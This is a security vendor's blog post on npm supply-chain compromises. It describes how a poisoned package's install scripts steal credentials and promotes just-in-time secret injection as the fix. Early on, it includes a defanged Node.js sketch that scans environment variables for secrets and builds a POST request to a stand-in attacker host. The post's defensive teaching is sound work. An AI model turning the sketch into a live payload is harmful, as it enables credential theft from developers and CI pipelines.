Speed in modern engineering comes from reusing open-source components, but that same dependency chain has become one of the most exploited attack surfaces on the internet.
This post walks through a realistic npm supply-chain compromise, how attackers turn a poisoned package into a full-blown breach, and a clean demo that shows a practical mitigation: just-in-time secret injection.
Supply-chain compromises happen across every language ecosystem — PyPI, RubyGems, Go modules — but npm remains the most frequently targeted.
Over the past few years, we’ve seen large-scale incidents (like Shai-Hulud recently), where a malicious npm package silently spread through CI systems and exfiltrated credentials from thousands of machines. That’s why we’re using npm as our example in this post. It’s representative of how real-world supply-chain attacks unfold across any modern stack.
Every supply-chain breach starts the same way: with trust. You install a dependency, like a new logging utility or a small helper buried ten layers deep, and assume it does what it says on the tin. But a single compromised maintainer account or poisoned package version can quietly turn that trust into an entry point.
A malicious package can execute automatically during install or build-time lifecycle scripts, such as preinstall or postinstall. From there, the payload runs in the context of your CI pipeline or developer environment with all the same privileges your tools have.
That’s where the real damage happens. These payloads are rarely loud or destructive; they’re designed to blend in. Most are short, heavily obfuscated scripts that scan for secrets in environment variables, .npmrc tokens, cached SDK credentials, or local kubeconfigs. Once they find anything interesting, they exfiltrate it. Often via a single POST request to an attacker-controlled endpoint disguised as a harmless telemetry or analytics domain.
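The scrape-and-exfiltrate step described above can be sketched in a few lines of Node.js. This is a defanged simulation: the secret-name pattern, the fake environment, and the endpoint URL are all illustrative, and the "exfiltration" only builds a request object instead of sending anything.

```javascript
// Defanged sketch of a secret-scraping payload (simulation only: nothing is sent).
// The key pattern and endpoint URL are illustrative assumptions.
const SECRET_PATTERN = /(TOKEN|KEY|SECRET|PASSWORD|CREDENTIAL)/i;

function harvestEnv(env) {
  // Collect every environment variable whose name looks secret-bearing.
  const found = {};
  for (const [name, value] of Object.entries(env)) {
    if (SECRET_PATTERN.test(name) && value) found[name] = value;
  }
  return found;
}

function buildExfilRequest(secrets) {
  // A real payload would POST this to an attacker endpoint disguised as
  // telemetry; here we only construct the request object.
  return {
    method: "POST",
    url: "https://telemetry.example-attacker.dev/collect", // illustrative
    body: JSON.stringify(secrets),
  };
}

// Example: simulate a CI environment.
const fakeEnv = { OPENAI_API_KEY: "sk-demo", PATH: "/usr/bin", NPM_TOKEN: "npm-demo" };
const req = buildExfilRequest(harvestEnv(fakeEnv));
console.log(req.body); // contains OPENAI_API_KEY and NPM_TOKEN, but not PATH
```

Note how little code this takes: a real payload adds obfuscation and a network call, but the logic is no more sophisticated than this.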
Armed with these secrets, an attacker can publish backdoored images to your container registry, or inject a hidden GitHub Actions workflow that grants long-term persistence. The poisoned package was just the initial infection; the stolen credentials are the real payload.
From there, the path is well-worn: the attacker waits for your deployment pipeline to pull their backdoored image, which eventually runs inside a Kubernetes pod with access to sensitive runtime secrets — OpenAI or Anthropic API keys, database credentials, or service tokens. Once inside, they can exfiltrate data, explore internal APIs, and move laterally across your environment.
In other words: a single malicious npm install can become a full-scale cloud breach.
Most teams already run dependency and vulnerability scanners, and they absolutely should. They catch outdated packages, known CVEs, typosquats, and dangerous permissions before they ship. But scanners live in a world of known vulnerabilities, while supply-chain attacks thrive in the world of unknown behavior. By the time a signature or rule exists, the exploit has already run in thousands of build environments. So even with the best coverage, a package can pass every check, execute malicious code, and leave no trace until it’s too late.
That’s why defense in depth matters. Static analysis tells you what you’re installing; runtime guardrails decide what it’s allowed to do once it runs. The rest of this post focuses on that second layer: how runtime identity and just-in-time secret injection make a compromise far less valuable for an attacker.
Once attackers get code execution, they follow a fast, repeatable playbook: harvest every secret reachable from the compromised process, exfiltrate it, then use the stolen credentials to pivot, persist, and escalate.
The simple lesson: if secrets are discoverable at runtime, a small compromise becomes a full breach. Remove those secrets from the attack surface and you dramatically reduce the blast radius.
Just-in-time injection means credentials aren’t baked into images, env vars, or files. They’re provisioned only to the specific process that needs them, just when it needs them. Delivery can happen in several ways: placed “on the wire” (for example, by adding headers to outbound HTTP calls), or written to an ephemeral file that’s only readable by that process.
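The on-the-wire variant can be sketched as a thin request wrapper. This is a minimal illustration under assumed names, not Riptides’ actual mechanism: fetchShortLivedToken stands in for whatever component attests the workload and mints a short-lived credential, and the wrapper returns a request description instead of sending it.

```javascript
// Sketch of on-the-wire credential injection (illustrative names throughout).
// The credential exists only inside the request path: it is never written to
// process.env, a file, or the container image.

async function fetchShortLivedToken() {
  // Stand-in: a real implementation would verify the workload's identity
  // and mint a scoped credential valid only for a short window.
  return { value: "demo-token", expiresAt: Date.now() + 5_000 };
}

async function injectedFetch(url, options = {}) {
  const token = await fetchShortLivedToken(); // provisioned just-in-time
  const headers = {
    ...(options.headers || {}),
    Authorization: `Bearer ${token.value}`,
  };
  // For the sketch we return the request description; a real wrapper
  // would forward it with fetch(url, { ...options, headers }).
  return { url, ...options, headers };
}
```

The application calls injectedFetch exactly as it would call fetch; the secret never appears in its environment, so there is nothing for an env-scanning payload to find.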
Why this matters: credentials never sit in the environment or on disk waiting to be scraped, so a compromised dependency finds nothing to steal; fewer secrets are exposed, fewer privileges can leak, and every credential use leaves a clearer audit trail.
This demo shows the exact attack chain described above, and how just-in-time injection breaks it.
At first everything looks fine. The Support-Assistant UI works as expected: you type a question, it fetches results from Postgres, asks the LLM for a summary, and returns the answer. It’s a completely ordinary helper agent, until one of its dependencies turns hostile.

A malicious npm package quietly executes at runtime and starts scanning environment variables. The screenshot below shows what happens next: our simulated payload sends the collected keys to an ngrok endpoint. The POST request includes both the OpenAI and Anthropic API keys.

The Riptides Connection Inventory page shows these outbound requests to unknown ngrok IPs. But a single successful request like this is all an attacker needs to steal API keys and escalate.

Even though the poisoned package doesn’t break the application itself, it silently opens connections and exfiltrates secrets. In a real incident, that one request would be enough to pivot deeper into your infrastructure.
Next, we strip the pod of its persistent secrets by setting the API keys to none. Now the system has nothing to leak, but the application also fails to call the LLM. In practice, you’d configure secret injection first, then remove environment variables, but here we intentionally break the app to show that the keys really are gone.
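The failure is exactly what you’d expect from a client with no credential. Here is a minimal sketch of that failure mode (callLLM is an illustrative stand-in, not the demo’s actual client code):

```javascript
// Sketch: why the app breaks once its persistent keys are stripped.
function callLLM(prompt, env = process.env) {
  const key = env.OPENAI_API_KEY;
  if (!key || key === "none") {
    // With the variable removed (or set to "none"), there is nothing to send.
    throw new Error("missing API key: no credential available in the environment");
  }
  // A real client would attach the key and call the provider's API here.
  return { prompt, authorization: `Bearer ${key}` };
}
```

This fail-closed behavior is the proof: if the app cannot authenticate, neither can a scraper running beside it.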

Now we turn on Riptides’ on-the-wire credential injection.
Instead of handing credentials to the environment, Riptides injects them dynamically into legitimate requests at runtime. Here’s a small snippet showing how it’s configured for an identity:

The app immediately resumes normal behavior without restarting pods or re-deploying images.

Finally, we check the malicious scraper again. It still executes, but now it has nothing to steal. The exfiltrated payload shows empty values: the exploit’s payoff is gone. In a real environment, that one change — removing persistent secrets and injecting them just-in-time — turns a full-scale breach into a contained event.
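A quick self-contained check makes the point: run the same class of env-scanning scraper against a stripped environment and the payload comes back empty (the pattern and variable names here are illustrative).

```javascript
// Sketch: the scraper still runs, but a stripped environment yields nothing.
const SECRET_PATTERN = /(TOKEN|KEY|SECRET|PASSWORD)/i;

function harvest(env) {
  // Keep only variables whose names look secret-bearing.
  return Object.fromEntries(
    Object.entries(env).filter(([name, value]) => SECRET_PATTERN.test(name) && value)
  );
}

// After moving to just-in-time injection, the pod's environment holds no credentials:
const strippedEnv = { PATH: "/usr/bin", HOME: "/home/app", NODE_ENV: "production" };
console.log(JSON.stringify(harvest(strippedEnv))); // "{}"
```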

A poisoned npm package is a plausible, common starting point for a large breach. You can’t catch every compromised dependency, but you can make compromises far less valuable. Removing persistent runtime secrets and delivering credentials just-in-time to a verified workload identity converts a likely data breach into a contained incident. That shift — fewer secrets exposed, fewer privileges leaked, and clearer audit trails — is the kind of measurable risk reduction security teams, engineering leaders, and auditors will actually care about.
If you’re interested in other secret-injection posts, check out our examples — On‑Demand Credentials: Secretless AI Assistant (GCP) and On‑the‑Wire Credential Injection: Secretless AWS/Bedrock.